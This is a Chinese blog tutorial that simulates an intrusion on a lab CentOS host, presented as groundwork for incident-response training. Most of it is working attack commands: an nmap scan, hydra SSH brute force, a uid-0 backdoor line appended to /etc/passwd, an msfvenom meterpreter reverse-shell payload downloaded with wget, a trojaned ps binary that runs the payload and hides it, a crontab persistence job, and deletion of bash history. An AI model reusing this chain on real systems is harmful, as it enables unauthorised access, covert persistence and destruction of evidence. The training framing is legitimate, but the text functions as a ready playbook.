渗透测试模拟实战——暴力破解、替换ps命令、留多个后门
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
一、环境搭建
Centos8系统 IP地址: 192.168.184.142
二、模拟攻击
2.1 扫描端口
拿到目标IP首先使用nmap扫描,探测一下开放的端口
nmap -sS 192.168.226.132
发现目标系统的22号端口开发
2.2 暴力破解root密码
使用 hydra 工具爆破 ssh 登录密码
hydra.exe -l root -P pass.txt ssh://192.168.226.132
#-l 用户名
#-L 用户名字典的根路径
#-p 密码
#-P 密码字典的根路径
成功爆破出密码
使用爆破出的密码成功登录目标系统
2.3 添加一个超级用户帐号:wxiaoge
增加一个与root有相同权限的账户:wxiaoge,作为后门账户
echo "wxiaoge:x:0:0::/:/bin/sh" >> /etc/passwd
passwd wxiaoge
密码自己随便设置
2.4 msf生成反弹shell
使用kali的msf生成反弹shell文件:shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.226.131 lport=6666 SessionCommunication=0 SessionExpirationTimeout=0 -f elf >shell.elf
之后将反弹shell文件:shell.elf下载到目标系统:192.168.226.132
登录192.168.226.132系统执行命令:
wget http://192.168.226.1/shell.elf
给 shell.elf 文件添加执行权限
chmod +x shell.elf
将 shell.elf 文件复制一份到根目录并且重命名为:centos_core.elf
mv shell.elf /centos_core.elf
最后kali 打开监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 6666
exploit
2.5 替换ps命令留后门
whereis ps #查找ps命令的位置发现在/usr/bin/ps
mkdir .hide_command #创建隐藏目录 hide_command
cd /.hide_command #进入.hide_command目录下面
mv /usr/bin/ps . #将/usr/bin/ps文件移动到当前目录,也就是.hide_command目录下面
查找PS命令,并且将PS命令文件移动到 /.hide_command 目录下
之后重新编写一个ps命令文件,创建一个ps 命令后门
vi /usr/bin/ps #创建ps文件#ps文件内容:#!/bin/bash
/centos_core.elf & /.hide_command/ps |grep -v "shell" | grep -v "centos_core" | grep "bash" #grep -v的意思是只打印没有匹配的,而匹配的反而不打印,相当于隐藏shell、centos_core、bash异常文件信息#之后每次执行ps命令就会执行后门文件shell.elf
2.6 留crontab后门
crontab -e #创建定时任务#crontab定时任务内容:
* * * * * /root/shell.elf
2.7 清除命令记录 history
因为使用的root账户进行操作,防止运维人员通过 history 命令看到所有的执行记录,因此要清除 history 内容
方法一:
history -c#history -c 清除的是当前会话的记录,原来的记录是不会被清除的
方法二:
因为 history 记录是记录在~/.bash_history中的,所以可以删除 root 账户的 .bash_history 文件
find ~/.bash_history #查找所有账户的.bash_history文件
rm -rf /root/.bash_history #删除 root 账户的.bash_history文件
2.8 kali监听
kali 收到了反弹的 shell
至此,模拟实战结束,成功留了ps命令后门、crontab后门
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
渗透测试模拟实战——暴力破解、替换ps命令、留多个后门相关推荐
- 渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 一.环境搭建 靶机: Windwos Server 2008 系统 靶机IP地址: 192.168.226.137 攻击IP地 ...
- 【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
目录 九头蛇hydra 使用方法 案例分析 暴破ssh登录密码 环境介绍 开始爆破 破解成功 测试登录 各种协议破解汇总 FTP协议破解 http协议破解 https协议破解 路由器破解 http-p ...
- web渗透测试----5、暴力破解漏洞--(6)VNC密码破解
文章目录 一.hydra 二.Medusa 三.Ncrack 四.Patator 五.Metasploit 虚拟网络控制台 (Virtual Network Console:VNC)是一款优秀的远程控 ...
- 渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的 ): 英文文档:https://nmap.org/book/man.html 中文文档:https://nmap.org/ ...
- 一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门——事件复现(含靶场环境)
一.事件背景 某天客户反馈:服务器疑似被入侵,与恶意IP进行通信(恶意IP用192.168.226.131代替).(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中) 受害服务 ...
- 渗透测试工具实战技巧合集
本文为作者总结自己在渗透测试中常用的一些小技巧.原文分为两部分,译者将其合二为一,方便大家查阅. 最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略# 主机发现,生成存活主机列 ...
- Kali渗透测试技术实战
第一章 引言 EC-Council Certified Ethical Hacker (EC CEH,伦理黑客认证).整个过程包含五个阶段:侦察.扫描.获取访问.维持访问以及清除痕迹. 第二章 下载并 ...
- 利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想
前些天Open入手了Teensy++2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些 ...
- Kali Linux渗透测试 106 离线密码破解
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
最新文章
- STM32命名,Flash分布,扇区
- Linux下CMake简明教程(八) 添加编译选项
- 元宇宙这把火开始烧向打工人
- java 日期函数转换_java 日期函数转换
- Java进阶之光!java字符串类型转换为int
- 跳转到系统默认的Home
- Node.js 4.0 中的 ES 6 特性介绍
- 【一分钟论文】IJCAI2019 | Self-attentive Biaffine Dependency Parsing
- java笔画数_Java调用setStroke()方法设置笔画属性的语法 原创
- 音频soundpool
- PCAN监测can总线状态设置
- 使用Sklearn学习决策树
- 用友u8 无法安装服务器系统,用友u8安装【解决方案】
- 基于大规模语料的新词发现算法
- 储备池计算(Reservoir Computing)综述
- 用二维数组进行学生的成绩排序和计算
- 网络传输介质有哪几种
- iQOO Neo7智能手机;索尼“地球蓝”LinkBuds S耳机;卡西欧多款40周年纪念款手表 | 科技新品...
- 前端设计人员必会技能 - gif动画图片制作
- 三天打鱼两天晒网(python)